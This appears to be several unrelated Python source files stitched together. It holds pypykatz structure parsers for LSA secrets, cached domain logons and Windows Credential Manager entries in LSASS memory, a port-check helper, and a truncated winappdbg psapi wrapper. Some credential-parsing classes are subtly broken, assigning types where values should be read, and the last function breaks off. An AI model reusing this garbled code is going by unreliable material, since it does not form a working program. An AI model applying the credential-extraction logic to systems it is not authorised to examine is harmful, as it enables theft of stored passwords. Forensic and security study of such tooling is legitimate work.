from volatility3.framework.configuration import requirements
from volatility3.framework.objects import utility
from volatility3.framework.symbols import intermed
from volatility3.framework.symbols.windows import extensions
from volatility3.framework.layers.scanners import MultiStringScanner
from volatility3.plugins.windows import pslist, vadinfo



#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import enum
import io

class LSA_SECRET_BLOB:
	def __init__(self):
		self.legnth = None
		self.unk = None
		self.secret = None
		#self.remaining = None
	
	@staticmethod
	def from_bytes(data):
		return LSA_SECRET_BLOB.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = LSA_SECRET_BLOB()
		sk.legnth = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unk = buff.read(12)
		sk.secret = buff.read(sk.legnth)
		return sk
		
	def __str__(self):
		t = '== LSA_SECRET_BLOB ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
		
class LSA_SECRET:
	def __init__(self):
		self.version = None
		self.enc_key_id = None
		self.enc_algo = None
		self.flags = None
		self.data = None
	
	@staticmethod
	def from_bytes(data):
		return LSA_SECRET.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = LSA_SECRET()
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.enc_key_id = buff.read(16)
		sk.enc_algo = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.flags = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.data = buff.read()
		
		return sk
		
	def __str__(self):
		t = '== LSA_SECRET ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
class LSA_SECRET_XP:
	def __init__(self):
		self.legnth = None
		self.version = None
		self.secret = None

	@staticmethod
	def from_bytes(data):
		return LSA_SECRET_XP.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = LSA_SECRET_XP()		
		sk.legnth = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.secret = buff.read(sk.legnth)
		
		return sk
		
	def __str__(self):
		t = '== LSA_SECRET_XP ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
		
class NL_RECORD:
	def __init__(self):
		self.UserLength = None
		self.DomainNameLength = None
		self.EffectiveNameLength = None
		self.FullNameLength = None
		self.LogonScriptName = None
		self.ProfilePathLength = None
		self.HomeDirectoryLength = None
		self.HomeDirectoryDriveLength = None
		self.UserId = None
		self.PrimaryGroupId = None
		self.GroupCount = None
		self.logonDomainNameLength = None
		self.unk0 = None
		self.LastWrite = None
		self.Revision = None
		self.SidCount = None
		self.Flags = None
		self.unk1 = None
		self.LogonPackageLength = None
		self.DnsDomainNameLength = None
		self.UPN = None
		self.IV = None
		self.CH = None
		self.EncryptedData = None
		
	@staticmethod
	def from_bytes(data):
		return NL_RECORD.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		nl = NL_RECORD()		
		nl.UserLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.DomainNameLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.EffectiveNameLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.FullNameLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.LogonScriptName = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.ProfilePathLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.HomeDirectoryLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.HomeDirectoryDriveLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.UserId = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.PrimaryGroupId = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.GroupCount = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.logonDomainNameLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.unk0 = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.LastWrite = int.from_bytes(buff.read(8), 'little', signed = False)
		nl.Revision = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.SidCount = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.Flags = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.unk1 = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.LogonPackageLength = int.from_bytes(buff.read(4), 'little', signed = False)
		nl.DnsDomainNameLength = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.UPN = int.from_bytes(buff.read(2), 'little', signed = False)
		nl.IV = buff.read(16)
		nl.CH = buff.read(16)
		nl.EncryptedData = buff.read()
		
		return nl
		
	def __str__(self):
		t = '== NL_RECORD ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t


import socket

def is_port_up(ip, port, timeout = 1, throw = False):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.settimeout(timeout)
	try:
		s.connect((ip, int(port)))
		s.shutdown(socket.SHUT_RDWR)
		return True
	except Exception as e:
		if throw is True:
			raise e
		return False
	finally:
		s.close()


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
import io
#from minidump.win_datatypes import *
from pypykatz.commons.common import hexdump
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild
from pypykatz.commons.win_datatypes import LSA_UNICODE_STRING, ULONG, PVOID, PWSTR, POINTER, LIST_ENTRY
from pypykatz.lsadecryptor.package_commons import PackageTemplate

class CredmanTemplate(PackageTemplate):
	def __init__(self):
		super().__init__('Credman')
		self.signature = None
		self.first_entry_offset = None
		self.list_entry = None
		
	@staticmethod
	def get_template(sysinfo):
		template = CredmanTemplate()
		
		if sysinfo.architecture == KatzSystemArchitecture.X64:	
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_5
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_60
			else:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY
		else:
			if sysinfo.buildnumber < WindowsMinBuild.WIN_VISTA.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_5_X86
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_60_X86
			else:
				template.list_entry = KIWI_CREDMAN_LIST_ENTRY_X86
			
		template.log_template('list_entry', template.list_entry)

		return template
	
class PKIWI_CREDMAN_LIST_ENTRY_5_X86(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_LIST_ENTRY_5_X86)
		
class KIWI_CREDMAN_LIST_ENTRY_5_X86:
	def __init__(self, reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		reader.move(reader.tell() - 32)
		reader.align() #not sure if it's needed here
		#
		self.cbEncPassword = ULONG(reader).value
		reader.align()
		self.encPassword = PWSTR(reader)
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = PVOID(reader)
		self.unk3 = PVOID(reader)
		self.UserName = PWSTR(reader)
		self.cbUserName = ULONG(reader).value
		reader.align()
		self.Flink = PKIWI_CREDMAN_LIST_ENTRY_5(reader)
		self.Blink = PKIWI_CREDMAN_LIST_ENTRY_5(reader)
		self.server1 = LSA_UNICODE_STRING(reader)
		self.unk6 = PVOID(reader)
		self.unk7 = PVOID(reader)
		self.user = LSA_UNICODE_STRING(reader)
		self.unk8 = ULONG(reader).value
		reader.align()
		self.server2 = LSA_UNICODE_STRING(reader)
	
class PKIWI_CREDMAN_LIST_ENTRY_60_X86(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_LIST_ENTRY_60_X86)

class KIWI_CREDMAN_LIST_ENTRY_60_X86:
	def __init__(self, reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		reader.move(reader.tell() - 32)
		reader.align() #not sure if it's needed here
		#
		#input('KIWI_CREDMAN_LIST_ENTRY_60 \n%s' % hexdump(reader.peek(0x200), start = reader.tell()))
		#
		self.cbEncPassword = ULONG(reader).value
		reader.align()
		self.encPassword = PWSTR(reader)
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = PVOID(reader)
		self.unk3 = PVOID(reader)
		self.UserName = PWSTR(reader)
		self.cbUserName = ULONG(reader).value
		reader.align()
		self.Flink = PKIWI_CREDMAN_LIST_ENTRY_60(reader)
		self.Blink = PKIWI_CREDMAN_LIST_ENTRY_60(reader)
		self.type = LSA_UNICODE_STRING(reader)
		self.unk5 = PVOID(reader)
		self.server1 = LSA_UNICODE_STRING(reader)
		self.unk6 = PVOID(reader)
		self.unk7 = PVOID(reader)
		self.unk8 = PVOID(reader)
		self.unk9 = PVOID(reader)
		self.unk10 = PVOID(reader)
		self.user = LSA_UNICODE_STRING(reader)
		self.unk11 = ULONG(reader).value
		reader.align()
		#print('a')
		#input('KIWI_CREDMAN_LIST_ENTRY_60 \n%s' % hexdump(reader.peek(0x50), start = reader.tell()))
		self.server2 = LSA_UNICODE_STRING(reader)
	
class PKIWI_CREDMAN_LIST_ENTRY_X86(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_LIST_ENTRY_X86)
		
class KIWI_CREDMAN_LIST_ENTRY_X86:
	def __init__(self, reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		reader.move(reader.tell() - 32)
		reader.align() #not sure if it's needed here
		
		#
		self.cbEncPassword = ULONG(reader).value
		reader.align()
		self.encPassword = PWSTR(reader)
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = PVOID(reader)
		self.unk3 = PVOID(reader)
		self.UserName = PWSTR(reader)
		self.cbUserName = ULONG(reader).value
		reader.align()
		self.Flink = PKIWI_CREDMAN_LIST_ENTRY(reader)
		self.Blink = PKIWI_CREDMAN_LIST_ENTRY(reader)
		self.unk4 = LIST_ENTRY(reader)
		self.type = LSA_UNICODE_STRING(reader)
		self.unk5 = PVOID(reader)
		self.server1 = LSA_UNICODE_STRING(reader)
		self.unk6 = PVOID(reader)
		self.unk7 = PVOID(reader)
		self.unk8 = PVOID(reader)
		self.unk9 = PVOID(reader)
		self.unk10 = PVOID(reader)
		self.user = LSA_UNICODE_STRING(reader)
		self.unk11 = ULONG(reader).value
		reader.align()
		self.server2 = LSA_UNICODE_STRING(reader)
		
		
class PKIWI_CREDMAN_LIST_ENTRY_5(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_LIST_ENTRY_5)
		
class KIWI_CREDMAN_LIST_ENTRY_5:
	def __init__(self, reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		reader.move(reader.tell() - 56)
		reader.align() #not sure if it's needed here
		#
		self.cbEncPassword = ULONG(reader).value
		reader.align()
		self.encPassword = PWSTR
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = PVOID(reader)
		self.unk3 = PVOID(reader)
		self.UserName = PWSTR(reader)
		self.cbUserName = ULONG(reader).value
		reader.align()
		self.Flink = PKIWI_CREDMAN_LIST_ENTRY_5
		self.Blink = PKIWI_CREDMAN_LIST_ENTRY_5
		self.server1 = LSA_UNICODE_STRING
		self.unk6 = PVOID(reader)
		self.unk7 = PVOID(reader)
		self.user = LSA_UNICODE_STRING(reader)
		self.unk8 = ULONG(reader).value
		reader.align()
		self.server2 = LSA_UNICODE_STRING
	
class PKIWI_CREDMAN_LIST_ENTRY_60(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_LIST_ENTRY_60)

class KIWI_CREDMAN_LIST_ENTRY_60:
	def __init__(self, reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		reader.move(reader.tell() - 56)
		reader.align() #not sure if it's needed here
		#
		#input('KIWI_CREDMAN_LIST_ENTRY_60 \n%s' % hexdump(reader.peek(0x200), start = reader.tell()))
		#
		self.cbEncPassword = ULONG(reader).value
		reader.align()
		self.encPassword = PWSTR(reader)
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = PVOID(reader)
		self.unk3 = PVOID(reader)
		self.UserName = PWSTR(reader)
		self.cbUserName = ULONG(reader).value
		reader.align()
		self.Flink = PKIWI_CREDMAN_LIST_ENTRY_60
		self.Blink = PKIWI_CREDMAN_LIST_ENTRY_60
		self.type = LSA_UNICODE_STRING(reader)
		self.unk5 = PVOID(reader)
		self.server1 = LSA_UNICODE_STRING(reader)
		self.unk6 = PVOID(reader)
		self.unk7 = PVOID(reader)
		self.unk8 = PVOID(reader)
		self.unk9 = PVOID(reader)
		self.unk10 = PVOID(reader)
		self.user = LSA_UNICODE_STRING(reader)
		self.unk11 = ULONG(reader).value
		reader.align()
		self.server2 = LSA_UNICODE_STRING(reader)
	
class PKIWI_CREDMAN_LIST_ENTRY(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_LIST_ENTRY)
		
class KIWI_CREDMAN_LIST_ENTRY:
	def __init__(self, reader):
		#IMPORTANT NOTICE, THE STRUCTURE STARTS BEFORE THE FLINK/BLINK POINTER, SO WE NEED TO READ BACKWARDS
		#
		#input('KIWI_CREDMAN_LIST_ENTRY \n%s' % hexdump(reader.peek(0x50), start = reader.tell()))
		reader.move(reader.tell() - 56)
		reader.align() #not sure if it's needed here
		
		#input('KIWI_CREDMAN_LIST_ENTRY \n%s' % hexdump(reader.peek(0x200), start = reader.tell()))
		#
		self.cbEncPassword = ULONG(reader).value
		reader.align()
		self.encPassword = PWSTR(reader)
		self.unk0 = ULONG(reader).value
		self.unk1 = ULONG(reader).value
		self.unk2 = PVOID(reader)
		self.unk3 = PVOID(reader)
		self.UserName = PWSTR(reader)
		self.cbUserName = ULONG(reader).value
		reader.align()
		self.Flink = PKIWI_CREDMAN_LIST_ENTRY(reader)
		self.Blink = PKIWI_CREDMAN_LIST_ENTRY(reader)
		self.unk4 = LIST_ENTRY(reader)
		self.type = LSA_UNICODE_STRING(reader)
		self.unk5 = PVOID(reader)
		self.server1 = LSA_UNICODE_STRING(reader)
		self.unk6 = PVOID(reader)
		self.unk7 = PVOID(reader)
		self.unk8 = PVOID(reader)
		self.unk9 = PVOID(reader)
		self.unk10 = PVOID(reader)
		self.user = LSA_UNICODE_STRING(reader)
		self.unk11 = ULONG(reader).value
		reader.align()
		self.server2 = LSA_UNICODE_STRING(reader)

class PKIWI_CREDMAN_LIST_STARTER(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_LIST_STARTER)
		
class KIWI_CREDMAN_LIST_STARTER:
	def __init__(self, reader):
		self.unk0 = ULONG(reader)
		reader.align()
		self.start = PKIWI_CREDMAN_LIST_ENTRY(reader)
		#...
	
class PKIWI_CREDMAN_SET_LIST_ENTRY(POINTER):
	def __init__(self, reader):
		super().__init__(reader, KIWI_CREDMAN_SET_LIST_ENTRY)
		
class KIWI_CREDMAN_SET_LIST_ENTRY:
	def __init__(self, reader):
		self.Flink = PKIWI_CREDMAN_SET_LIST_ENTRY(reader)
		self.Blink = PKIWI_CREDMAN_SET_LIST_ENTRY(reader)
		self.unk0 = ULONG(reader).value
		reader.align()
		self.list1 = PKIWI_CREDMAN_LIST_STARTER(reader)
		self.list2 = PKIWI_CREDMAN_LIST_STARTER(reader)
	
		
		
		


#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Copyright (c) 2009-2016, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
#     * Redistributions of source code must retain the above copyright notice,
#       this list of conditions and the following disclaimer.
#     * Redistributions in binary form must reproduce the above copyright
#       notice,this list of conditions and the following disclaimer in the
#       documentation and/or other materials provided with the distribution.
#     * Neither the name of the copyright holder nor the names of its
#       contributors may be used to endorse or promote products derived from
#       this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

"""
Wrapper for psapi.dll in ctypes.
"""

from .defines import *

#==============================================================================
# This is used later on to calculate the list of exported symbols.
_all = None
_all = set(vars().keys())
#==============================================================================

#--- PSAPI structures and constants -------------------------------------------

LIST_MODULES_DEFAULT    = 0x00
LIST_MODULES_32BIT      = 0x01
LIST_MODULES_64BIT      = 0x02
LIST_MODULES_ALL        = 0x03

# typedef struct _MODULEINFO {
#   LPVOID lpBaseOfDll;
#   DWORD  SizeOfImage;
#   LPVOID EntryPoint;
# } MODULEINFO, *LPMODULEINFO;
class MODULEINFO(Structure):
    _fields_ = [
        ("lpBaseOfDll",     LPVOID),    # remote pointer
        ("SizeOfImage",     DWORD),
        ("EntryPoint",      LPVOID),    # remote pointer
]
LPMODULEINFO = POINTER(MODULEINFO)

#--- psapi.dll ----------------------------------------------------------------

# BOOL WINAPI EnumDeviceDrivers(
#   __out  LPVOID *lpImageBase,
#   __in   DWORD cb,
#   __out  LPDWORD lpcbNeeded
# );
def EnumDeviceDrivers():
    _EnumDeviceDrivers = windll.psapi.EnumDeviceDrivers
    _EnumDeviceDrivers.argtypes = [LPVOID, DWORD, LPDWORD]
    _EnumDeviceDrivers.restype = bool
    _EnumDeviceDrivers.errcheck = RaiseIfZero

    size       = 0x1000
    lpcbNeeded = DWORD(size)
    unit       = sizeof(LPVOID)
    while 1:
        lpImageBase = (LPVOID * (size // unit))()
        _EnumDeviceDrivers(byref(lpImageBase), lpcbNeeded, byref(lpcbNeeded))
        needed = lpcbNeeded.value
        if needed <= size:
            break
        size = needed
    return [ lpImageBase[index] for index in range(0, (needed // unit)) ]

# BOOL WINAPI EnumProcesses(
#   __out  DWORD *pProcessIds,
#   __in   DWORD cb,
#   __out  DWORD *pBytesReturned
# );
def EnumProcesses():
    _EnumProcesses = windll.psapi.EnumProcesses
    _EnumProcesses.argtypes = [LPVOID, DWORD, LPDWORD]
    _EnumProcesses.restype = bool
    _EnumProcesses.errcheck = RaiseIfZero

    size            = 0x1000
    cbBytesReturned = DWORD()
    unit            = sizeof(DWORD)
    while 1:
        ProcessIds = (DWORD * (size // unit))()
        cbBytesReturned.value = size
        _EnumProcesses(byref(ProcessIds), cbBytesReturned, byref(cbBytesReturned))
        returned = cbBytesReturned.value
        if returned < size:
            break
        size = size + 0x1000
    ProcessIdList = {}
    for ProcessId in ProcessIds:
        if ProcessId is None:
            break
        ProcessIdList[ProcessId] = 1
    return list(ProcessIdList.keys())

# BOOL WINAPI EnumProcessModules(
#   __in   HANDLE hProcess,
#   __out  HMODULE *lphModule,
#   __in   DWORD cb,
#   __out  LPDWORD lpcbNeeded
# );
def EnumProcessModules(hProcess):
    _EnumProcessModules = windll.psapi.EnumProcessModules
    _EnumProcessModules.argtypes = [HANDLE, LPVOID, DWORD, LPDWORD]
    _EnumProcessModules.restype = bool
    _EnumProcessModules.errcheck = RaiseIfZero

    size = 0x1000
    lpcbNeeded = DWORD(size)
    unit = sizeof(HMODULE)
    while 1:
        lphModule = (HMODULE * (size // unit))()
        _EnumProcessModules(hProcess, byref(lphModule), lpcbNeeded, byref(lpcbNeeded))
        needed = lpcbNeeded.value
        if needed <= size:
            break
        size = needed
    return [ lphModule[index] for index in range(0, int(needed // unit)) ]

# BOOL WINAPI EnumProcessModulesEx(
#   __in   HANDLE hProcess,
#   __out  HMODULE *lphModule,
#   __in   DWORD cb,
#   __out  LPDWORD lpcbNeeded,
#   __in   DWORD dwFilterFlag
# );
def EnumProcessModulesEx(hProcess, dwFilterFlag = LIST_MODULES_DEFAULT):
    _EnumProcessModulesEx = windll.psapi.EnumProcessModulesEx
    _EnumProcessModulesEx.argtypes = [HANDLE, LPVOID, DWORD, LPDWORD, DWORD]
    _EnumProcessModulesEx.restype = bool
    _EnumProcessModulesEx.errcheck = RaiseIfZero

    size = 0x1000
    lpcbNeeded = DWORD(size)
    unit = sizeof(HMODULE)
    while 1:
        lphModule = (HMODULE * (size // unit))()
        _EnumProcessModulesEx(hProcess, byref(lphModule), lpcbNeeded, byref(lpcbNeeded), dwFilterFlag)
        needed = lpcbNeeded.value
        if needed <= size:
            break
        size = needed
    return [ lphModule[index] for index in range(0, (needed // unit)) ]

# DWORD WINAPI GetDeviceDriverBaseName(
#   __in   LPVOID ImageBase,
#   __out  LPTSTR lpBaseName,
#   __in   DWORD nSize
# );
def GetDeviceDriverBaseNameA(ImageBase):
    _GetDeviceDriverBaseNameA = windll.psapi.GetDeviceDriverBaseNameA
    _GetDeviceDriverBaseNameA.argtypes = [LPVOID, LPSTR, DWORD]
    _GetDeviceDriverBaseNameA.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpBaseName = ctypes.create_string_buffer("", nSize)
        nCopied = _GetDeviceDriverBaseNameA(ImageBase, lpBaseName, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpBaseName.value

def GetDeviceDriverBaseNameW(ImageBase):
    _GetDeviceDriverBaseNameW = windll.psapi.GetDeviceDriverBaseNameW
    _GetDeviceDriverBaseNameW.argtypes = [LPVOID, LPWSTR, DWORD]
    _GetDeviceDriverBaseNameW.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpBaseName = ctypes.create_unicode_buffer(u"", nSize)
        nCopied = _GetDeviceDriverBaseNameW(ImageBase, lpBaseName, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpBaseName.value

GetDeviceDriverBaseName = GuessStringType(GetDeviceDriverBaseNameA, GetDeviceDriverBaseNameW)

# DWORD WINAPI GetDeviceDriverFileName(
#   __in   LPVOID ImageBase,
#   __out  LPTSTR lpFilename,
#   __in   DWORD nSize
# );
def GetDeviceDriverFileNameA(ImageBase):
    _GetDeviceDriverFileNameA = windll.psapi.GetDeviceDriverFileNameA
    _GetDeviceDriverFileNameA.argtypes = [LPVOID, LPSTR, DWORD]
    _GetDeviceDriverFileNameA.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_string_buffer("", nSize)
        nCopied = ctypes.windll.psapi.GetDeviceDriverFileNameA(ImageBase, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpFilename.value

def GetDeviceDriverFileNameW(ImageBase):
    _GetDeviceDriverFileNameW = windll.psapi.GetDeviceDriverFileNameW
    _GetDeviceDriverFileNameW.argtypes = [LPVOID, LPWSTR, DWORD]
    _GetDeviceDriverFileNameW.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_unicode_buffer(u"", nSize)
        nCopied = ctypes.windll.psapi.GetDeviceDriverFileNameW(ImageBase, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpFilename.value

GetDeviceDriverFileName = GuessStringType(GetDeviceDriverFileNameA, GetDeviceDriverFileNameW)

# DWORD WINAPI GetMappedFileName(
#   __in   HANDLE hProcess,
#   __in   LPVOID lpv,
#   __out  LPTSTR lpFilename,
#   __in   DWORD nSize
# );
def GetMappedFileNameA(hProcess, lpv):
    _GetMappedFileNameA = ctypes.windll.psapi.GetMappedFileNameA
    _GetMappedFileNameA.argtypes = [HANDLE, LPVOID, LPSTR, DWORD]
    _GetMappedFileNameA.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_string_buffer("", nSize)
        nCopied = _GetMappedFileNameA(hProcess, lpv, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpFilename.value

def GetMappedFileNameW(hProcess, lpv):
    _GetMappedFileNameW = ctypes.windll.psapi.GetMappedFileNameW
    _GetMappedFileNameW.argtypes = [HANDLE, LPVOID, LPWSTR, DWORD]
    _GetMappedFileNameW.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_unicode_buffer(u"", nSize)
        nCopied = _GetMappedFileNameW(hProcess, lpv, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpFilename.value

GetMappedFileName = GuessStringType(GetMappedFileNameA, GetMappedFileNameW)

# DWORD WINAPI GetModuleFileNameEx(
#   __in      HANDLE hProcess,
#   __in_opt  HMODULE hModule,
#   __out     LPTSTR lpFilename,
#   __in      DWORD nSize
# );
def GetModuleFileNameExA(hProcess, hModule = None):
    _GetModuleFileNameExA = ctypes.windll.psapi.GetModuleFileNameExA
    _GetModuleFileNameExA.argtypes = [HANDLE, HMODULE, LPSTR, DWORD]
    _GetModuleFileNameExA.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_string_buffer("", nSize)
        nCopied = _GetModuleFileNameExA(hProcess, hModule, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpFilename.value

def GetModuleFileNameExW(hProcess, hModule = None):
    _GetModuleFileNameExW = ctypes.windll.psapi.GetModuleFileNameExW
    _GetModuleFileNameExW.argtypes = [HANDLE, HMODULE, LPWSTR, DWORD]
    _GetModuleFileNameExW.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_unicode_buffer(u"", nSize)
        nCopied = _GetModuleFileNameExW(hProcess, hModule, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpFilename.value

GetModuleFileNameEx = GuessStringType(GetModuleFileNameExA, GetModuleFileNameExW)

# BOOL WINAPI GetModuleInformation(
#   __in   HANDLE hProcess,
#   __in   HMODULE hModule,
#   __out  LPMODULEINFO lpmodinfo,
#   __in   DWORD cb
# );
def GetModuleInformation(hProcess, hModule, lpmodinfo = None):
    _GetModuleInformation = windll.psapi.GetModuleInformation
    _GetModuleInformation.argtypes = [HANDLE, HMODULE, LPMODULEINFO, DWORD]
    _GetModuleInformation.restype = bool
    _GetModuleInformation.errcheck = RaiseIfZero

    if lpmodinfo is None:
        lpmodinfo = MODULEINFO()
    _GetModuleInformation(hProcess, hModule, byref(lpmodinfo), sizeof(lpmodinfo))
    return lpmodinfo

# DWORD WINAPI GetProcessImageFileName(
#   __in   HANDLE hProcess,
#   __out  LPTSTR lpImageFileName,
#   __in   DWORD nSize
# );
def GetProcessImageFileNameA(hProcess):
    _GetProcessImageFileNameA = windll.psapi.GetProcessImageFileNameA
    _GetProcessImageFileNameA.argtypes = [HANDLE, LPSTR, DWORD]
    _GetProcessImageFileNameA.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_string_buffer("", nSize)
        nCopied = _GetProcessImageFileNameA(hProcess, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
    return lpFilename.value

def GetProcessImageFileNameW(hProcess):
    _GetProcessImageFileNameW = windll.psapi.GetProcessImageFileNameW
    _GetProcessImageFileNameW.argtypes = [HANDLE, LPWSTR, DWORD]
    _GetProcessImageFileNameW.restype = DWORD

    nSize = MAX_PATH
    while 1:
        lpFilename = ctypes.create_unicode_buffer(u"", nSize)
        nCopied = _GetProcessImageFileNameW(hProcess, lpFilename, nSize)
        if nCopied == 0:
            raise ctypes.WinError()
        if nCopied < (nSize - 1):
            break
        nSize = nSize + MAX_PATH
